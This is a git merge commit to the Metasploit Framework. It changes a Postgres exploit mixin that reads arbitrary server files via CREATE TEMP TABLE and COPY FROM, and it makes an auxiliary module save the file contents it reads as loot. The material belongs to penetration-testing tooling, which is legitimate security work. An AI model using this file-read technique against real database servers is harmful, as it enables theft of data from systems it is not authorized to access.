Merge branch 'bug/4400-postgres-store-loot' of https://github.com/jlee-r7/metasploit-framework into jlee-r7-bug/4400-postgres-store-loot

unstable
sinn3r 2012-05-23 20:38:03 -05:00
commit 101abb45a1
2 changed files with 10 additions and 1 deletions

View File

@ -263,7 +263,7 @@ module Exploit::Remote::Postgres
read_query = %Q{CREATE TEMP TABLE #{temp_table_name} (INPUT TEXT);
COPY #{temp_table_name} FROM '#{filename}';
SELECT * FROM #{temp_table_name}}
read_return = postgres_query(read_query,true)
read_return = postgres_query(read_query)
end
def postgres_has_database_privilege(priv)

View File

@ -15,6 +15,7 @@ require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Postgres
include Msf::Auxiliary::Report
def initialize(info = {})
super(update_info(info,
@ -67,6 +68,14 @@ class Metasploit3 < Msf::Auxiliary
print_error "#{rhost}:#{rport} Postgres - #{ret[:sql_error]}"
end
when :complete
loot = ''
ret[:complete].rows.each { |row|
print_line(row.first)
loot << row.first
}
# No idea what the actual ctype will be, text/plain is just a guess
path = store_loot('postgres.file', 'text/plain', rhost, loot, datastore['RFILE'])
print_status("#{rhost}:#{rport} Postgres - #{datastore['RFILE']} saved in #{path}")
vprint_good "#{rhost}:#{rport} Postgres - Command complete."
end
postgres_logout if self.postgres_conn